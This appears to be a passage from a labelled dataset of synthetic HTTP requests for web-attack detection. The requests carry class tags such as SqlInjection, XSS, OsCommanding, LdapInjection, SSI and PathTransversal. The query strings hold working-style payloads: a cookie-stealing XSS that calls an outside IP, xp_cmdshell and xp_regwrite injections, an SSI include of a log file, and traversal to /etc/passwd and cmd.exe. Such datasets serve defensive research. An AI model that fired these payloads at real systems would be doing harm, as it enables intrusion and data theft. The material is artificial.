Accept-Charset: windows-1253;q=0.1, windows-1252, windows-1258;q=0.0
Accept-Encoding: gzip, compress;q=0.4, gzip, compress
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 111.152.191.252
Cookie: hgg=aaiUu;decho;xuaeosxisfuhO=4pieoneo;7gricLasaytteu=oxesr7ihaanaanmD5;d8aigye5ia2soe=held
Cookie2: $Version="74"
Date: Sat, 23 Feb 08 02:14:27 CET
ETag: W/"3_efAi020xTGsJzsTVz"
Expect: 100-continue
From: 6boleoo@ai5nodlHti.be
If-Modified-Since: Sat, 19 Feb 05 01:24:05 GMT
If-Unmodified-Since: Sat, 01 Jan 05 16:35:02 UTC
If-Match: *
If-None-Match: "NtTBkiQr7.qr_qJGPp"
If-Range: "WgFAGtq-T.atbi6qVwQg"
Max-Forwards: 63
MIME-Version: 7.3
Pragma: sda=nNrEdci
Proxy-Authorization: Basic V3I2dGV5dzppZXR0ZW5pYw==
Authorization: Digest algorithm=MD5-sess
Range: 77-,76-
Referer: /9hrqs1/iNrlaUbe/rSouo.zip
TE: chunked;q=0.5
Trailer: Pragma
User-Agent: Mozilla/5.4 (X11; U; Linux i386 8.8; l6-at; rv:3.7.1) Gecko/36426573
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 0.7 153.90.85.13
Transfer-Encoding: identity
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 152.42.151.28
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38083
Start - Id: 41268
class: SqlInjection
GET /edwruyedeE.swf?53aE=oCLf5eDN&tb8=fLVKTGj-&P3mo_AXsSc=04646&gds=2N&bTTsso=4061216&ee1ipsi=aDRunad%3Cteycimhrw&uvsh=iIsr1hhe HTTP/1.0
Host: www.a8mlEiae.biz
Connection: pngycne
Accept: image/*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, compress, gzip;q=0.0, gzip
Accept-Language: lbjhin-e, seao-nq1, yepAL-wm;q=0.4, gqea-oooemea
Cache-Control: max-age=7
Client-ip: 129.234.186.132
Cookie: ntiainie9uav=eShcyeqlael0ehawr;ln=te26eredbn;aorH=OrigText'OR'pe'=  'mOr4ree';9nwbtb0ipdefe=ftne9snyoee;texT=iypinput
Cookie2: $Version="418"
Date: Wed, 10 Jan 07 23:12:02 UTC
ETag: "DxfWlx@4Kurs7MW"
Expect: oehsmNbr=td4gOaz
From: secaxaii@ljoAtaiiwf.de
If-Modified-Since: Sun, 06 Jun 04 08:18:08 CET
If-Unmodified-Since: Sun, 31 Oct 04 13:12:27 UTC
If-Match: "Qwcam7u.bRggVSiZdr"
If-None-Match: "0Yy_Z9Kp2XQ_spfIY3i"
If-Range: "o1rbqH6OZs@6JGfm5"
Max-Forwards: 1939
MIME-Version: 2.4
Pragma: z=p
Proxy-Authorization: Digest cnonce="4dmgm"
Authorization: ikXotk aaaOpnnF=8oe99c2
Range: -78675,-73,41-
Referer: /il5Lmrts/iodeOi.ace
TE: gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: Mozilla/1.2 (X11; U; Linux i386 1.3; he-am; rv:1.8.7) Gecko/82111985
UA-OS: Win9x
UA-Pixels: 557x1445
Via: 1.2 154.71.44.182:5442
Transfer-Encoding: identity
Upgrade: iyhnr/0.0, awhact/3.4, e1delp/1.8, 3goK/3.2, deeso/8.6
Warning: 292 236.224.211.136 "whsgbaeh2iSTibeIwt" "Tue, 02 Sep 08 21:32:22 GMT"
X-Forwarded-For: 31.90.227.178
X-Serial-Number: 2028120
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41268
Start - Id: 43791
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: www.roTo.org
Connection: close
Accept: */*
Accept-Charset: shift_jis, x-mac-arabic;q=0.8, x-mac-turkish
Accept-Encoding: gzip, gzip;q=0.5, gzip
Accept-Language: *;q=0.8
Cache-Control: max-stale=34
Client-ip: 50.135.195.138
Cookie: eqrsueto=>;zsz=aootfclP0t6tMciDn;sodwe4mtndACeta=t;63Eas=728226881;Eebehpa4l=69236
Cookie2: $Version="730"
Date: Mon, 04 Feb 08 24:00:39 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: eOrde=mEgiaao
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Thu, 02 Apr 09 24:12:52 CET
If-Match: *
If-None-Match: "X0vDchMuUzzbLnZ"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 983
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: Digest uri=http://www.di4ltNi.ch/aeide/eyaUyier/treawTa.nsf
Range: 904036-,02113-35,44499-
Referer: http://Atr6v.uk/frSsm/A9dmdu/oese/lsnHAIfl.txt
TE: trailers,trailers,gzip
Trailer: Pragma
User-Agent: u3de9deiriisstdfg7o
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 697x813
Via: 0.9 www.ehn4el.shtml, 0.3 47.202.161.185, HTTP/0.1 192.73.163.75
Transfer-Encoding: deflate
Upgrade: Vsr3e/6.8
Warning: 460 www.n9Mes.jpeg:02263 "Eetoalsmogtatnc" 
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43791
Start - Id: 48077
class: XSS
GET /tWct8HyWbx4wuarxRtoz/mlenesl7nis5Sgo/SyCadxrrhaahis/azese/s.wryBZ1@_vmGOQQ68o/NeGun/rnnnbihdorAhloaedil0/51lEnganDtgcoses/u-2X3mrpC0DUIMFmFU3.jpg?ss5=%3Ca++href+%3D++%22+javas%26%2399%3Bript%26%2335%3B%5Bwindow.open%28%27http%3A%2F%2F219.65.97.96%2Fna.asp%27%2Bdocument.cookie%29%3B%5D%22++++%3E&lg2=3184501255&ct=55&omYJuwqPU=hhob&dOGf=7&81n7tm=93131 HTTP/1.0
Host: 240.249.137.242:12
Connection: close
Accept: text/xml;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 151.8.225.81
Cookie: oeaeeqomtnShEdt=ek3;yfehatitadK=hdn8ecrp;pvslu2Eatt1Dt=8738;asoMl=3;8s=cua:
Cookie2: $Version="5"
Date: Wed, 18 Jan 06 15:07:05 CET
ETag: "U9-YQ6G4Lm_.cAH"
Expect: el2z=ptrgaejs
From: pr43lq@7remye.cz
If-Modified-Since: Thu, 10 Sep 09 15:11:57 CET
If-Unmodified-Since: Mon, 15 Nov 04 24:06:42 CET
If-Match: *
If-None-Match: "Nvg0jxTzLr-Gcr9.lw"
If-Range: *
Max-Forwards: 25
MIME-Version: 5.2
Pragma: hroea5r=rbt6
Proxy-Authorization: Digest nonce
Authorization: NTLM ZmVodnNoc29lcmVlY290ZW9haDRhbnVyZ2Y4Tm9pbGVlc3VkVHVkdGZ1
Range: 5052-
Referer: http://2lwgk0s.gov/aayDtEeR.jpg
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: e4gngoalt/7.0.4.9
UA-CPU: StrongARM
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: OoR/7.2 77.231.65.186
Transfer-Encoding: gzip
Upgrade: urlbSi/7.2, soAe/2.2, syle/8.0
Warning: 125 99.127.238.144 "ioisG0" "Sun, 22 Oct 06 11:55:13 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48077
Start - Id: 35396
class: SqlInjection
GET /tv7tt/25Sbh-/oncAboejveat.html?ateoi=%27UNIONALLSELECTfieldFROMisdenadengWHERE%27%27++++%3D%27 HTTP/1.0
Host: www.eatul.de
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: 
Accept-Language: sttsp6n-hakl3, qE-lfe, ed3s-vt0ohmiM
Cache-Control: max-age=9
Client-ip: 61.188.211.30
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="4"
Date: Fri, 09 Apr 10 08:06:09 CET
ETag: "mfU9h94k7@Umcm6q4wE"
Expect: tqnkotl=tntt5;qeotah=wGst
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Wed, 16 Feb 05 23:51:31 UTC
If-Unmodified-Since: Thu, 11 May 06 05:38:56 CET
If-Match: "eOvB8jiw4g9-alM7Mk3"
If-None-Match: *
If-Range: "5LkSCrlPbaT_H-Ke@"
Max-Forwards: 1
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: Tjehtr umimnIt=4idd
Range: 24492-281270
Referer: /lenuuera/lsnoO/leaq/7tiewrn/itEn4.rar
TE: trailers,trailers
Trailer: Pragma
User-Agent: n@LMlJ http://www.uotde.net
UA-CPU: Sparc
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 177x860
Via: 7.9 155.11.91.69:9235, FTP/1.6 www.thpzsDe.jpeg:7
Transfer-Encoding: zsrg; eekne=uNvccIa
Upgrade: nk2i4r/2.9, ipzf/4.9
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35396
Start - Id: 44091
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: 19.71.8.80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: on-grpbto;q=0.1, farhto-t5to;q=0.3, eUnn-sp5dia8a;q=0.2, rnteoeE-Zathhtoy;q=0.4, AaehbaHt-unwyt;q=0.6
Cache-Control: max-stale
Client-ip: 237.235.110.125
Cookie: tEa=tteaR7dk
Cookie2: $Version="617"
Date: Tue, 28 Feb 06 23:12:31 UTC
ETag: "ZS9GbP3St8Y_vcI."
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Mon, 07 Nov 05 13:11:27 UTC
If-Unmodified-Since: Sat, 01 Oct 05 18:17:51 GMT
If-Match: "mJG1VccndMgHM4B"
If-None-Match: *
If-Range: "vvMV2gbB21BtCiHa"
Max-Forwards: 5
MIME-Version: 0.4
Pragma: tpee3pwh=etrzuti
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic YmlvdHRicG46R2hvY2N5dA==
Range: 70-
Referer: http://sHfU.gov/rmih1n.nsf
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/6.9 (Windows; U; WinNT 5.4; 43-er; rv:7.9.5) Gecko/20382756
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: 3.2 www.wdri72.tiff
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 521 www.mjfat.css "dRa1e4l2ilrotmytl" "Sun, 12 Nov 06 05:55:58 UTC"
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44091
Start - Id: 38386
class: LdapInjection
GET /iO@qlETmwpa5Rmc2iLN/sS_7ufL/n62xWco./sit/m4NTS/d7/8SAbJ2hgnGZBltJatMHu/xrhJeetetvio1/htfHdwROUf1s/ohnDoioKL/cerqwh139VyDZcugwAli.cfm?t5q5sseeT=7ehucIrstswzobjrv&riv2paoeirhub=820&a9uiUtr0teMv=5976862358&coeed4vh2ftueo=4mnullteniaaw%3B8Tni8tog&nDheeloumgoue=mTb&a@DJGZenxmlESH=1546714&gpSfksaeha=%29+%28+%7C+++%28displayName%3Dhad*%29++%28name++%3D++++had*+++%29%28++mail%3Dhad*+++%29&uee1ltieraeutc5=5&Esatyrm=lru2O&olsss7vdDsye5a=198954 HTTP/1.1
Host: www.h5u6xomae.biz
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-cyrillic;q=0.2, iso-8859-8;q=0.4
Accept-Encoding: gzip, compress;q=0.2, gzip;q=0.7, compress, compress;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 64.84.236.66
Cookie: passwd9KPT=iiT;TnddoxhcciiqDs==Th+ih;nh9o=9283;eyadasjjethanho= %ufo7rrFrmeerrxp_t;litedptnozgPesi=nAxy43.R
Cookie2: $Version="662"
Date: Wed, 27 Dec 06 02:10:43 UTC
ETag: W/"yNFl3unHM9j-nY_lvkD"
Expect: uFhie
From: e3ig@cUsnasr.com
If-Modified-Since: Sat, 08 Dec 07 06:15:45 UTC
If-Unmodified-Since: Tue, 21 Nov 06 09:51:10 UTC
If-Match: "Gk7arPnYhjnnwlU1FqI8"
If-None-Match: *
If-Range: Thu, 14 Jan 10 16:11:26 UTC
Max-Forwards: 94
MIME-Version: 7.6
Pragma: siad='Ea'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: 6tlnns eeqe0aFp=reTdotc
Range: 5-3896,18685-499682,-36
Referer: /g5ottos.gif
TE: gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: exfWT..EwN http://www.dweon.com
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: ocess5/0.8 181.220.211.32, g3ewgb/3.0 www.wed6y.js
Transfer-Encoding: deflate
Upgrade: ottf/8.1, nEtN/4.3, m1n4n/1.7, fN2/3.2, attfJ/3.6
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 120.14.244.116
X-Serial-Number: 85165873223938
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38386
Start - Id: 37669
class: LdapInjection
POST /tcaruotuhdxvhle8aa/eW3GX/eU@Lqvr9Y9KkfnueJhb/n6Zx3RAvf7CudxHfFR6.cgi? HTTP/1.1
Content-Length: 82
Content-Language: y
Content-Encoding: deflate
Content-Location: http://oyattka.biz/al4io1/n0y4s20.ace
Content-MD5: dHBuZU9xYWhuQXJhb3ZjTw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Mar 07 04:17:17 UTC
Last-Modified: Sat, 03 Feb 07 08:15:25 UTC
Host: 25.0.251.164
Connection: close
Accept: */*
Accept-Charset: iso-8859-2;q=0.0, windows-874;q=0.9, windows-1250;q=0.0, x-mac-japanese
Accept-Encoding: *;q=0.7
Accept-Language: a-eti, OWtcpN-aogvosps;q=0.6, Ni-osmt
Cache-Control: no-cache
Client-ip: 126.146.68.99
Cookie: oeiiodmql=jlbKZfPXZNM;RnwwffounngddOh=ieotytslls&tmlike4q ;a3NcA3h=ebOLn
Cookie2: $Version="94"
Date: Tue, 15 Dec 09 19:05:47 GMT
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: eavrng@Ual9isu.biz
If-Modified-Since: Sun, 09 Jan 05 05:01:11 CET
If-Unmodified-Since: Thu, 16 Dec 04 15:42:40 UTC
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: *
If-Range: Wed, 08 Feb 06 05:57:29 CET
Max-Forwards: 75
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: NTLM MXNuYnRvYTkyd3R4NWRiQW0yaGFmc3N0ZjRqc210RW5hOGFpYnBlemVuN2pu
Range: 7-75,773-,28-851
Referer: http://www.weenlio.org/ro9dhs6/sqa3.nsf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/8.7 (compatible; sXennacrai; Win98; a5nXq2os5)
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: deou
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 193.224.2.50
X-Serial-Number: 0737126851
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pra1obxw=)    ( |  (cry=peyIr*)&iah4c=stmI4np8b&iuYtt=ehEvgneeba]oop

End - Id: 37669
Start - Id: 41088
class: SqlInjection
GET /6etmsrNItemIal3/dnoteeht4hcna3/lQ_/e_bRLaBOA/78CQb8a/siyi/pb3cersy8/32/hI/iXy5HuQ@UZYkXM1G1.gif?em=n%3Etl&rifea=o4ipzh&Yeai=gi6&ueeesei=rEng&rz=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&usBBtIarw=cmdbt%7Een0&xptoaYtcomme=00536&iMuslEmhhce9d=a&ca7aswmuBR=access_logoGrymwW&jweeaaSnnaA=66757715 HTTP/1.1
Host: 142.99.145.168
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-korean;q=0.7, ks_c_5601-1987;q=0.1, windows-1250, euc-jp, hz-gb-2312;q=0.0
Accept-Encoding: gzip;q=0.2
Accept-Language: end-Ps5ae, octMhfHo-iesp
Cache-Control: only-if-cached
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="0"
Date: Sat, 12 Sep 09 10:26:50 CET
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: mhst@6auiinb.st
If-Modified-Since: Fri, 21 Dec 07 09:48:07 GMT
If-Unmodified-Since: Wed, 19 Oct 05 07:43:59 CET
If-Match: "2O7TMQWlB4Qer2PEazSl"
If-None-Match: *
If-Range: Thu, 03 Nov 05 17:30:46 GMT
Max-Forwards: 7
MIME-Version: 7.6
Pragma: ntei='t'
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: http://www.nxlesyet.biz/aneti/ciog/rexa.msf
TE: chunked;q=0.7,deflate,gzip;q=0.7
Trailer: From
User-Agent: Mozilla/1.8 (compatible; Konqueror/2.4; Mac OS X; aururekgs; ilirt)
UA-CPU: StrongARM
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: HTTP/9.5 www.lsey.js, HTTP/6.7 137.59.172.118:482
Transfer-Encoding: identity
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41088
Start - Id: 42212
class: SqlInjection
GET /jtnsinlP/dropYzVapisamMNopen/o4HSqjOlB1aoAurZu-h/VtZEikqM/d00ZRNif/u2bwH1cYIRre/u7.v/mteui7/4XbnC.dll?ree8=le0haynodertu&utrrcsir8s1tow=k%3Ej&2t=16278447&ccI1osho=rAi9%28Oea+adorn&hoooNerOe0=Oun&4tewttrwAe=select++++o5aanoa++from+ALL_USERS&meeryhci1wma=vheE%28&6IBh50a=83219&2jeznme3t=272148855&uOhsf59ENe=2e7ekgyaaorr%7Cori HTTP/1.1
Host: 120.182.107.189
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad, x-mac-cyrillic;q=0.9, windows-1250;q=0.5, iso-10646-ucs-2
Accept-Encoding: identity, gzip, compress;q=0.0, identity, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 110.245.212.227
Cookie: aBnt=c7G;reeougA=283;5l@QgB2dKh=2;ZCA0=$rD;s3kijEtlincdsl9=3772190773
Cookie2: $Version="62"
Date: Wed, 13 Apr 05 17:18:49 GMT
ETag: "08QcJQ-@nCVHGD-jk@-M"
Expect: Loobi=oDnd
From: eoflnz@oasc.com
If-Modified-Since: Wed, 04 Jan 06 16:24:30 UTC
If-Unmodified-Since: Wed, 24 Aug 05 23:43:17 UTC
If-Match: "9.455jTE6DTQmB@iNr"
If-None-Match: *
If-Range: Sat, 19 Feb 05 21:31:27 UTC
Max-Forwards: 0874
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: neda 5r8eLien=h6assRnt
Range: 8473-303,-227666,770360-
Referer: http://hzePu.be/er8l/seierf/gpneJnnM/tNaNhEg/isaS2.php4
TE: trailers
Trailer: Max-Forwards
User-Agent: fL7irs (ewRqofQpx; w1niiEaUl; o5LklY0C; jIhtdz)
UA-CPU: 68000
UA-Disp: 327,4301,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: FTP/7.3 173.29.124.148:0, HTTP/7.6 www.Itmhtun.js
Transfer-Encoding: gzip
Upgrade: he8e/9.1, uArqem/3.7, oettlh/8.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42212
Start - Id: 39738
class: SSI
GET /tNhuHkew7eMi.htm?ihOchhgrhqui=%3C%21--+++++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&ic=o&0ef=%3AiSrns-od%27%3CUc&rer=4657478&tpsdtbven=osee5filnt&q3WdPkjcxOv=sl&edn3Bnsihna=34&jI2h7m=m&yuwtW=53618&6Srho8fh=0538&2jfnS.=4529420&rRhsa=tth4%7C&5Nohclb=e6o&c78ir2T=8d HTTP/1.1
Host: www.osiiti.org
Connection: close
Accept: application/postscript;q=0.3, image/gif;q=0.7
Accept-Charset: cp-950, euc-jp;q=0.8, x-mac-japanese, isiri-3342;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 127.62.226.109
Cookie: ttss2ieuh=lggtrnn:d62;eN8osushtzqt=50522
Cookie2: $Version="7"
Date: Tue, 23 Jun 09 22:57:52 CET
ETag: "tYCCtqQXAuY.j2b@k7Gs"
Expect: 100-continue
From: edtEiwvr@nastnEtx.it
If-Modified-Since: Thu, 09 Feb 06 12:23:12 UTC
If-Unmodified-Since: Fri, 23 May 08 16:48:19 CET
If-Match: "THAbnYVe-RfmuAA3"
If-None-Match: *
If-Range: *
Max-Forwards: 8741
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Ilaaw 1hcnv=r7t63
Range: -58,-7,-12255
Referer: /etao/tlse/sdah/ssaIu1/alaojz7.php3
TE: deflate
Trailer: Host
User-Agent: OliiaTnn6nssBkrss
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 930x2188
Via: 8.7 31.3.176.208, pdt3i5/7.2 12.54.88.254, 1.8 222.255.101.54
Transfer-Encoding: gzip
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39738
Start - Id: 46370
class: PathTransversal
GET /Jf/VZcFPusrsam/nZSVZAM.H-Sz@JOb8eb..html?pS=nycsiterd9ma&E8Iatnrch9Homa1=ntiatit4t&dtmrah=h&n1lteezom4=97809844&eopa5fttoLsr5p=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&hm7naarss=iVW0&eadStb=7&veo=2303 HTTP/1.1
Host: www.snqrhofoes.cz
Connection: close
Accept: */*;q=0.8
Accept-Charset: macintosh, cp-936;q=0.7, x-mac-arabic;q=0.4, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: 4-uoytuny;q=0.8, aasasiia-etITeo5;q=0.8
Cache-Control: min-fresh=9443
Client-ip: 214.183.248.166
Cookie: tmvE0=l1he;n9ht7Tsy2=299657;orlfjnrs=e1ihhomehvqSn/ andyro;n4rtudjLcw=)gapa
Cookie2: $Version="402"
Date: Wed, 03 Nov 04 02:23:22 CET
ETag: W/"jgwdRdcly_6yEEbe9Sv@"
Expect: gotdd5
From: cewts@1fgr.fr
If-Modified-Since: Thu, 19 Jun 08 14:25:17 GMT
If-Unmodified-Since: Wed, 20 Aug 08 14:09:37 CET
If-Match: *
If-None-Match: "pcMMfBcBpW4B.Uakz"
If-Range: *
Max-Forwards: 98
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: NTLM dUg5aXJFbW9odmxvZTJzeWV0ZTdhdGFkcjVhZGhzdHBFenl0bA==
Range: 2-1818,846125-
Referer: /jlnf1g.swf
TE: trailers,trailers,chunked
Trailer: Date
User-Agent: xAH3cqYJr http://www.st4Tieed.gov
UA-CPU: StrongARM
UA-Color: color8
UA-Pixels: 3216x516
Via: 7.7 www.dmpei.js:368, FTP/4.7 183.94.249.12:979
Transfer-Encoding: stg2; llfa=ecsm
Upgrade: ls17ea/6.1, if8/2.6, eEewts/0.2, pvyt/8.4
Warning: 019 www.7IncbS.jpeg "Lwzurocdatoo" "Fri, 17 Apr 09 01:12:13 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46370
Start - Id: 36411
class: OsCommanding
GET /.wPzmkvPNDkaf8K/btoi9raNp.nsf?tso9g=1374&oTuoSohdne=uuWsQg&ie=oUC&auefrxsA=9UiXlFM9&rgatrsa=exec+xp_regwrite+++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27A6oel%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&r5sqntlFshheA=0480524 HTTP/1.0
Host: 96.120.27.209
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, x-mac-japanese, windows-1251;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 133.214.196.239
Cookie: t3rtd9=stKIuvxI
Cookie2: $Version="16"
Date: Sat, 12 Jun 04 16:50:02 GMT
ETag: "hOr.gXCisBKC7v6cJQ"
Expect: 100-continue
If-Modified-Since: Sun, 23 May 04 21:56:53 CET
If-Unmodified-Since: Wed, 26 Nov 08 16:09:34 UTC
If-Match: "uf@5i@C4Nvt3msDFd7y"
If-None-Match: "fSPHXRMjPU.XynlmrRPs"
If-Range: *
Max-Forwards: 143
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM bmlvMHVsbHB0bGNvbGF0aW5XYmphZW5MYXNvdGlvRXJBaGd3NGVmZ20=
Authorization: oadi wa4vrgfs=fietzjqd
Range: 15-,7348-823
Referer: http://ona3A.ch/m3tt851h/ed6di.shtml
TE: trailers,gzip;q=0.7
Trailer: From
User-Agent: Mozilla/1.9 (Windows; U; Win 9x 9.3; re-oi; rv:5.2.8) Gecko/63312305
UA-CPU: PowerPC
UA-Color: color16
Via: HTTP/5.2 131.19.139.57:0220, 8.3 www.reae.jpeg
Transfer-Encoding: identity
Upgrade: ehax/0.1, twoX/5.2, amhin/1.7, Nyuis8/4.4, rta/1.3
Warning: 271 125.50.84.12 "ieans4Sb3nfr1aNeeTba" "Fri, 16 Dec 05 02:23:13 UTC"
X-Serial-Number: 3132284615
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36411
Start - Id: 43757
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tr6itgneox.st
Connection: msCl
Accept: audio/basic;q=0.3, application/rtf, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: b-tekae;q=0.4, eKtip-eht4, lvhe-etnrrl, akun-zee4h;q=0.7
Cache-Control: max-age=07907
Client-ip: 251.209.185.79
Cookie: peDthio=17lnd;tLi5okfRnqntfyf=stamincludecneroiBR;apUaLf=e6angsobdtstaag4;oinar=tpbBqpvUalc;herr5TYosikd=eop2
Cookie2: $Version="1"
Date: Mon, 09 Feb 09 15:00:57 GMT
ETag: W/"eswt@0WOjNcHm0ay1zzd"
Expect: wspr4ebT
From: Reoco@amlrswscus.de
If-Modified-Since: Sun, 22 Nov 09 13:15:37 CET
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: "1uuUSlNtTmympqYd"
If-Range: *
